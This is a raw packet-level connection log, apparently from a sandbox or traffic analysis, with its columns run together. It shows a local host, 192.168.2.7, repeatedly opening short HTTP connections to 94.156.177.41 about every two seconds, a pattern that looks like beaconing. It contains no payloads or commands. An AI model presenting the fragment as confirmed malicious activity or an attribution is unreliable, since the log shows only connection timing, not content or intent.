                            Nov 28, 2024 09:14:36.540818930 CET4975580192.168.2.794.156.177.41
                            Nov 28, 2024 09:14:36.543272972 CET4975580192.168.2.794.156.177.41
                            Nov 28, 2024 09:14:36.663381100 CET804975594.156.177.41192.168.2.7
                            Nov 28, 2024 09:14:36.663455963 CET4975580192.168.2.794.156.177.41
                            Nov 28, 2024 09:14:36.783449888 CET804975594.156.177.41192.168.2.7
                            Nov 28, 2024 09:14:38.124994040 CET804975594.156.177.41192.168.2.7
                            Nov 28, 2024 09:14:38.125119925 CET804975594.156.177.41192.168.2.7
                            Nov 28, 2024 09:14:38.125230074 CET4975580192.168.2.794.156.177.41
                            Nov 28, 2024 09:14:38.125335932 CET4975580192.168.2.794.156.177.41
                            Nov 28, 2024 09:14:38.246284962 CET804975594.156.177.41192.168.2.7
                            Nov 28, 2024 09:14:38.276103020 CET4976080192.168.2.794.156.177.41
                            Nov 28, 2024 09:14:38.396275997 CET804976094.156.177.41192.168.2.7
                            Nov 28, 2024 09:14:38.396361113 CET4976080192.168.2.794.156.177.41
                            Nov 28, 2024 09:14:38.398513079 CET4976080192.168.2.794.156.177.41
                            Nov 28, 2024 09:14:38.518390894 CET804976094.156.177.41192.168.2.7
                            Nov 28, 2024 09:14:38.518569946 CET4976080192.168.2.794.156.177.41
                            Nov 28, 2024 09:14:38.638530970 CET804976094.156.177.41192.168.2.7
                            Nov 28, 2024 09:14:39.946322918 CET804976094.156.177.41192.168.2.7
                            Nov 28, 2024 09:14:39.946419001 CET4976080192.168.2.794.156.177.41
                            Nov 28, 2024 09:14:39.946614027 CET804976094.156.177.41192.168.2.7
                            Nov 28, 2024 09:14:39.946661949 CET4976080192.168.2.794.156.177.41
                            Nov 28, 2024 09:14:40.066663980 CET804976094.156.177.41192.168.2.7
                            Nov 28, 2024 09:14:40.086544037 CET4976480192.168.2.794.156.177.41
                            Nov 28, 2024 09:14:40.207299948 CET804976494.156.177.41192.168.2.7
                            Nov 28, 2024 09:14:40.207508087 CET4976480192.168.2.794.156.177.41
                            Nov 28, 2024 09:14:40.209947109 CET4976480192.168.2.794.156.177.41
                            Nov 28, 2024 09:14:40.329955101 CET804976494.156.177.41192.168.2.7
                            Nov 28, 2024 09:14:40.330194950 CET4976480192.168.2.794.156.177.41
                            Nov 28, 2024 09:14:40.450066090 CET804976494.156.177.41192.168.2.7
                            Nov 28, 2024 09:14:41.795125961 CET804976494.156.177.41192.168.2.7
                            Nov 28, 2024 09:14:41.795375109 CET804976494.156.177.41192.168.2.7
                            Nov 28, 2024 09:14:41.795444012 CET4976480192.168.2.794.156.177.41
                            Nov 28, 2024 09:14:41.795497894 CET4976480192.168.2.794.156.177.41
                            Nov 28, 2024 09:14:41.915447950 CET804976494.156.177.41192.168.2.7
                            Nov 28, 2024 09:14:42.291522980 CET4977080192.168.2.794.156.177.41
                            Nov 28, 2024 09:14:42.411644936 CET804977094.156.177.41192.168.2.7
                            Nov 28, 2024 09:14:42.411780119 CET4977080192.168.2.794.156.177.41
                            Nov 28, 2024 09:14:42.414340973 CET4977080192.168.2.794.156.177.41
                            Nov 28, 2024 09:14:42.534320116 CET804977094.156.177.41192.168.2.7
                            Nov 28, 2024 09:14:42.534472942 CET4977080192.168.2.794.156.177.41
                            Nov 28, 2024 09:14:42.654577971 CET804977094.156.177.41192.168.2.7
                            Nov 28, 2024 09:14:43.957528114 CET804977094.156.177.41192.168.2.7
                            Nov 28, 2024 09:14:43.957642078 CET804977094.156.177.41192.168.2.7
                            Nov 28, 2024 09:14:43.957647085 CET4977080192.168.2.794.156.177.41
                            Nov 28, 2024 09:14:43.957691908 CET4977080192.168.2.794.156.177.41
                            Nov 28, 2024 09:14:44.077722073 CET804977094.156.177.41192.168.2.7
                            Nov 28, 2024 09:14:44.102941990 CET4977580192.168.2.794.156.177.41
                            Nov 28, 2024 09:14:44.222898960 CET804977594.156.177.41192.168.2.7
                            Nov 28, 2024 09:14:44.223175049 CET4977580192.168.2.794.156.177.41
                            Nov 28, 2024 09:14:44.225384951 CET4977580192.168.2.794.156.177.41
                            Nov 28, 2024 09:14:44.345629930 CET804977594.156.177.41192.168.2.7
                            Nov 28, 2024 09:14:44.345690966 CET4977580192.168.2.794.156.177.41
                            Nov 28, 2024 09:14:44.465722084 CET804977594.156.177.41192.168.2.7
                            Nov 28, 2024 09:14:45.763281107 CET804977594.156.177.41192.168.2.7
                            Nov 28, 2024 09:14:45.763384104 CET804977594.156.177.41192.168.2.7
                            Nov 28, 2024 09:14:45.763442993 CET4977580192.168.2.794.156.177.41
                            Nov 28, 2024 09:14:45.763489962 CET4977580192.168.2.794.156.177.41
                            Nov 28, 2024 09:14:45.883416891 CET804977594.156.177.41192.168.2.7
                            Nov 28, 2024 09:14:45.907886028 CET4977980192.168.2.794.156.177.41
                            Nov 28, 2024 09:14:46.027906895 CET804977994.156.177.41192.168.2.7
                            Nov 28, 2024 09:14:46.028026104 CET4977980192.168.2.794.156.177.41
                            Nov 28, 2024 09:14:46.037662029 CET4977980192.168.2.794.156.177.41
                            Nov 28, 2024 09:14:46.157742977 CET804977994.156.177.41192.168.2.7
                            Nov 28, 2024 09:14:46.159487009 CET4977980192.168.2.794.156.177.41
                            Nov 28, 2024 09:14:46.279572010 CET804977994.156.177.41192.168.2.7
                            Nov 28, 2024 09:14:47.671871901 CET804977994.156.177.41192.168.2.7
                            Nov 28, 2024 09:14:47.672061920 CET804977994.156.177.41192.168.2.7
                            Nov 28, 2024 09:14:47.672120094 CET4977980192.168.2.794.156.177.41
                            Nov 28, 2024 09:14:47.672161102 CET4977980192.168.2.794.156.177.41
                            Nov 28, 2024 09:14:47.792084932 CET804977994.156.177.41192.168.2.7
                            Nov 28, 2024 09:14:47.820902109 CET4978580192.168.2.794.156.177.41
                            Nov 28, 2024 09:14:47.940947056 CET804978594.156.177.41192.168.2.7
                            Nov 28, 2024 09:14:47.941035032 CET4978580192.168.2.794.156.177.41
                            Nov 28, 2024 09:14:47.943588972 CET4978580192.168.2.794.156.177.41
                            Nov 28, 2024 09:14:48.063630104 CET804978594.156.177.41192.168.2.7
                            Nov 28, 2024 09:14:48.063766003 CET4978580192.168.2.794.156.177.41
                            Nov 28, 2024 09:14:48.183825970 CET804978594.156.177.41192.168.2.7
                            Nov 28, 2024 09:14:49.534215927 CET804978594.156.177.41192.168.2.7
                            Nov 28, 2024 09:14:49.534383059 CET804978594.156.177.41192.168.2.7
                            Nov 28, 2024 09:14:49.534405947 CET4978580192.168.2.794.156.177.41
                            Nov 28, 2024 09:14:49.534445047 CET4978580192.168.2.794.156.177.41
                            Nov 28, 2024 09:14:49.654366016 CET804978594.156.177.41192.168.2.7
                            Nov 28, 2024 09:14:49.680223942 CET4979180192.168.2.794.156.177.41
                            Nov 28, 2024 09:14:49.800507069 CET804979194.156.177.41192.168.2.7
                            Nov 28, 2024 09:14:49.800600052 CET4979180192.168.2.794.156.177.41
                            Nov 28, 2024 09:14:49.802853107 CET4979180192.168.2.794.156.177.41
                            Nov 28, 2024 09:14:49.922825098 CET804979194.156.177.41192.168.2.7
                            Nov 28, 2024 09:14:49.922880888 CET4979180192.168.2.794.156.177.41
                            Nov 28, 2024 09:14:50.042838097 CET804979194.156.177.41192.168.2.7
                            Nov 28, 2024 09:14:51.346460104 CET804979194.156.177.41192.168.2.7
                            Nov 28, 2024 09:14:51.346606016 CET4979180192.168.2.794.156.177.41
                            Nov 28, 2024 09:14:51.346610069 CET804979194.156.177.41192.168.2.7
                            Nov 28, 2024 09:14:51.346668959 CET4979180192.168.2.794.156.177.41
                            Nov 28, 2024 09:14:51.466613054 CET804979194.156.177.41192.168.2.7
                            Nov 28, 2024 09:14:51.494152069 CET4979580192.168.2.794.156.177.41
                            Nov 28, 2024 09:14:51.614540100 CET804979594.156.177.41192.168.2.7
                            Nov 28, 2024 09:14:51.614634037 CET4979580192.168.2.794.156.177.41
                            Nov 28, 2024 09:14:51.616909981 CET4979580192.168.2.794.156.177.41
                            Nov 28, 2024 09:14:51.736905098 CET804979594.156.177.41192.168.2.7
                            Nov 28, 2024 09:14:51.737035990 CET4979580192.168.2.794.156.177.41
                            Nov 28, 2024 09:14:51.857009888 CET804979594.156.177.41192.168.2.7
                            Nov 28, 2024 09:14:53.209688902 CET804979594.156.177.41192.168.2.7
                            Nov 28, 2024 09:14:53.209852934 CET804979594.156.177.41192.168.2.7
                            Nov 28, 2024 09:14:53.209908962 CET4979580192.168.2.794.156.177.41
                            Nov 28, 2024 09:14:53.214732885 CET4979580192.168.2.794.156.177.41
                            Nov 28, 2024 09:14:53.334685087 CET804979594.156.177.41192.168.2.7
                            Nov 28, 2024 09:14:53.417813063 CET4979980192.168.2.794.156.177.41
                            Nov 28, 2024 09:14:53.537884951 CET804979994.156.177.41192.168.2.7
                            Nov 28, 2024 09:14:53.538090944 CET4979980192.168.2.794.156.177.41
                            Nov 28, 2024 09:14:53.571193933 CET4979980192.168.2.794.156.177.41
                            Nov 28, 2024 09:14:53.691185951 CET804979994.156.177.41192.168.2.7
                            Nov 28, 2024 09:14:53.691338062 CET4979980192.168.2.794.156.177.41
                            Nov 28, 2024 09:14:53.811299086 CET804979994.156.177.41192.168.2.7
                            Nov 28, 2024 09:14:55.171257973 CET804979994.156.177.41192.168.2.7
                            Nov 28, 2024 09:14:55.171408892 CET804979994.156.177.41192.168.2.7
                            Nov 28, 2024 09:14:55.171475887 CET4979980192.168.2.794.156.177.41
                            Nov 28, 2024 09:14:55.171506882 CET4979980192.168.2.794.156.177.41
                            Nov 28, 2024 09:14:55.291439056 CET804979994.156.177.41192.168.2.7
                            Nov 28, 2024 09:14:55.319854021 CET4980480192.168.2.794.156.177.41
                            Nov 28, 2024 09:14:55.439927101 CET804980494.156.177.41192.168.2.7
                            Nov 28, 2024 09:14:55.440172911 CET4980480192.168.2.794.156.177.41
                            Nov 28, 2024 09:14:55.442383051 CET4980480192.168.2.794.156.177.41
                            Nov 28, 2024 09:14:55.562302113 CET804980494.156.177.41192.168.2.7
                            Nov 28, 2024 09:14:55.562437057 CET4980480192.168.2.794.156.177.41
                            Nov 28, 2024 09:14:55.682601929 CET804980494.156.177.41192.168.2.7
                            Nov 28, 2024 09:14:57.021995068 CET804980494.156.177.41192.168.2.7
                            Nov 28, 2024 09:14:57.022038937 CET804980494.156.177.41192.168.2.7
                            Nov 28, 2024 09:14:57.022104979 CET4980480192.168.2.794.156.177.41
                            Nov 28, 2024 09:14:57.022406101 CET4980480192.168.2.794.156.177.41
                            Nov 28, 2024 09:14:57.142376900 CET804980494.156.177.41192.168.2.7
                            Nov 28, 2024 09:14:57.171819925 CET4980880192.168.2.794.156.177.41
                            Nov 28, 2024 09:14:57.291899920 CET804980894.156.177.41192.168.2.7
                            Nov 28, 2024 09:14:57.292061090 CET4980880192.168.2.794.156.177.41
                            Nov 28, 2024 09:14:57.294624090 CET4980880192.168.2.794.156.177.41
                            Nov 28, 2024 09:14:57.414588928 CET804980894.156.177.41192.168.2.7
                            Nov 28, 2024 09:14:57.414725065 CET4980880192.168.2.794.156.177.41
                            Nov 28, 2024 09:14:57.534584045 CET804980894.156.177.41192.168.2.7
                            Nov 28, 2024 09:14:58.885855913 CET804980894.156.177.41192.168.2.7
                            Nov 28, 2024 09:14:58.885993004 CET804980894.156.177.41192.168.2.7
                            Nov 28, 2024 09:14:58.886053085 CET4980880192.168.2.794.156.177.41
                            Nov 28, 2024 09:14:58.888678074 CET4980880192.168.2.794.156.177.41
                            Nov 28, 2024 09:14:59.006861925 CET804980894.156.177.41192.168.2.7
                            Nov 28, 2024 09:14:59.029784918 CET4981480192.168.2.794.156.177.41
                            Nov 28, 2024 09:14:59.149698973 CET804981494.156.177.41192.168.2.7
                            Nov 28, 2024 09:14:59.149815083 CET4981480192.168.2.794.156.177.41
                            Nov 28, 2024 09:14:59.152620077 CET4981480192.168.2.794.156.177.41
                            Nov 28, 2024 09:14:59.272629976 CET804981494.156.177.41192.168.2.7
                            Nov 28, 2024 09:14:59.272741079 CET4981480192.168.2.794.156.177.41
                            Nov 28, 2024 09:14:59.392962933 CET804981494.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:00.692267895 CET804981494.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:00.692289114 CET804981494.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:00.692481995 CET4981480192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:00.695126057 CET4981480192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:00.818473101 CET804981494.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:00.847510099 CET4982080192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:00.967649937 CET804982094.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:00.967858076 CET4982080192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:00.971061945 CET4982080192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:01.091104031 CET804982094.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:01.091238976 CET4982080192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:01.213289976 CET804982094.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:02.364192009 CET804982094.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:02.364324093 CET804982094.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:02.364423990 CET4982080192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:02.364520073 CET4982080192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:02.484510899 CET804982094.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:02.508704901 CET4982380192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:02.628673077 CET804982394.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:02.628834009 CET4982380192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:02.630995989 CET4982380192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:02.750912905 CET804982394.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:02.750976086 CET4982380192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:02.870970011 CET804982394.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:04.221290112 CET804982394.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:04.221323967 CET804982394.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:04.221399069 CET4982380192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:04.221453905 CET4982380192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:04.341289997 CET804982394.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:04.368134022 CET4982980192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:04.488385916 CET804982994.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:04.488569021 CET4982980192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:04.490891933 CET4982980192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:04.610960007 CET804982994.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:04.611133099 CET4982980192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:04.731062889 CET804982994.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:06.031249046 CET804982994.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:06.031290054 CET804982994.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:06.031419992 CET4982980192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:06.036458015 CET4982980192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:06.156296968 CET804982994.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:06.183024883 CET4983380192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:06.303078890 CET804983394.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:06.303174019 CET4983380192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:06.305591106 CET4983380192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:06.425457954 CET804983394.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:06.425626993 CET4983380192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:06.545587063 CET804983394.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:07.898154020 CET804983394.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:07.898283958 CET804983394.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:07.898324966 CET4983380192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:07.898324966 CET4983380192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:08.018341064 CET804983394.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:08.040370941 CET4983980192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:08.160428047 CET804983994.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:08.160593987 CET4983980192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:08.162962914 CET4983980192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:08.282944918 CET804983994.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:08.283034086 CET4983980192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:08.402939081 CET804983994.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:09.702014923 CET804983994.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:09.702095032 CET804983994.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:09.702159882 CET4983980192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:09.702179909 CET4983980192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:09.822078943 CET804983994.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:09.850207090 CET4984480192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:09.970186949 CET804984494.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:09.970455885 CET4984480192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:09.972512007 CET4984480192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:10.092473984 CET804984494.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:10.092586994 CET4984480192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:10.212503910 CET804984494.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:11.605264902 CET804984494.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:11.605341911 CET804984494.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:11.605393887 CET4984480192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:11.605441093 CET4984480192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:11.725316048 CET804984494.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:11.744023085 CET4984980192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:11.863863945 CET804984994.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:11.864037037 CET4984980192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:11.866663933 CET4984980192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:11.986581087 CET804984994.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:11.986717939 CET4984980192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:12.106698990 CET804984994.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:13.478025913 CET804984994.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:13.478086948 CET804984994.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:13.478183031 CET4984980192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:13.478249073 CET4984980192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:13.598707914 CET804984994.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:13.627201080 CET4985480192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:13.747234106 CET804985494.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:13.747492075 CET4985480192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:13.749624014 CET4985480192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:13.869771957 CET804985494.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:13.869863987 CET4985480192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:13.989857912 CET804985494.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:15.453273058 CET804985494.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:15.453370094 CET804985494.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:15.453442097 CET4985480192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:15.453491926 CET4985480192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:15.573386908 CET804985494.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:15.600888968 CET4985980192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:15.720804930 CET804985994.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:15.720957994 CET4985980192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:15.723330975 CET4985980192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:15.843511105 CET804985994.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:15.847454071 CET4985980192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:15.967370033 CET804985994.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:17.303266048 CET804985994.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:17.303436041 CET804985994.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:17.303514957 CET4985980192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:17.307210922 CET4985980192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:17.427062035 CET804985994.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:17.529196024 CET4986480192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:17.649235010 CET804986494.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:17.649322033 CET4986480192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:17.651669025 CET4986480192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:17.771691084 CET804986494.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:17.771783113 CET4986480192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:17.891849995 CET804986494.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:19.281728029 CET804986494.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:19.281932116 CET804986494.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:19.281949997 CET4986480192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:19.282015085 CET4986480192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:19.401938915 CET804986494.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:19.429486990 CET4986980192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:19.549590111 CET804986994.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:19.549734116 CET4986980192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:19.551938057 CET4986980192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:19.671838999 CET804986994.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:19.671910048 CET4986980192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:19.791768074 CET804986994.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:21.096005917 CET804986994.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:21.096029043 CET804986994.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:21.096193075 CET4986980192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:21.096359015 CET4986980192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:21.216237068 CET804986994.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:21.247045994 CET4987480192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:21.367754936 CET804987494.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:21.367985964 CET4987480192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:21.370218039 CET4987480192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:21.490272045 CET804987494.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:21.490326881 CET4987480192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:21.610210896 CET804987494.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:22.994276047 CET804987494.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:22.994337082 CET804987494.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:22.994412899 CET4987480192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:22.994457006 CET4987480192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:23.114780903 CET804987494.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:23.136806011 CET4988080192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:23.256901979 CET804988094.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:23.257000923 CET4988080192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:23.259109974 CET4988080192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:23.379081964 CET804988094.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:23.380780935 CET4988080192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:23.500791073 CET804988094.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:24.698816061 CET804988094.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:24.698976040 CET804988094.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:24.699038982 CET4988080192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:24.699080944 CET4988080192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:24.819026947 CET804988094.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:24.835324049 CET4988580192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:24.955389023 CET804988594.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:24.955550909 CET4988580192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:24.957735062 CET4988580192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:25.077685118 CET804988594.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:25.077799082 CET4988580192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:25.197841883 CET804988594.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:26.498522043 CET804988594.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:26.498611927 CET804988594.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:26.498742104 CET4988580192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:26.498792887 CET4988580192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:26.618766069 CET804988594.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:26.657732964 CET4988980192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:26.777687073 CET804988994.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:26.777820110 CET4988980192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:26.779984951 CET4988980192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:26.899873972 CET804988994.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:26.899972916 CET4988980192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:27.019934893 CET804988994.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:28.370992899 CET804988994.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:28.371006966 CET804988994.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:28.371146917 CET4988980192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:28.371191025 CET4988980192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:28.491168022 CET804988994.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:28.505445957 CET4989380192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:28.625425100 CET804989394.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:28.625518084 CET4989380192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:28.627492905 CET4989380192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:28.747426033 CET804989394.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:28.747512102 CET4989380192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:28.867515087 CET804989394.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:30.274113894 CET804989394.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:30.274219990 CET4989380192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:30.274233103 CET804989394.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:30.274274111 CET4989380192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:30.394237041 CET804989394.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:30.413125038 CET4989880192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:30.533133030 CET804989894.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:30.533246040 CET4989880192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:30.535348892 CET4989880192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:30.655227900 CET804989894.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:30.655415058 CET4989880192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:30.775304079 CET804989894.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:32.167747974 CET804989894.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:32.167948961 CET804989894.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:32.168060064 CET4989880192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:32.168133020 CET4989880192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:32.287996054 CET804989894.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:32.310107946 CET4990380192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:32.430146933 CET804990394.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:32.432780027 CET4990380192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:32.434931993 CET4990380192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:32.554898024 CET804990394.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:32.556716919 CET4990380192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:32.676821947 CET804990394.156.177.41192.168.2.7
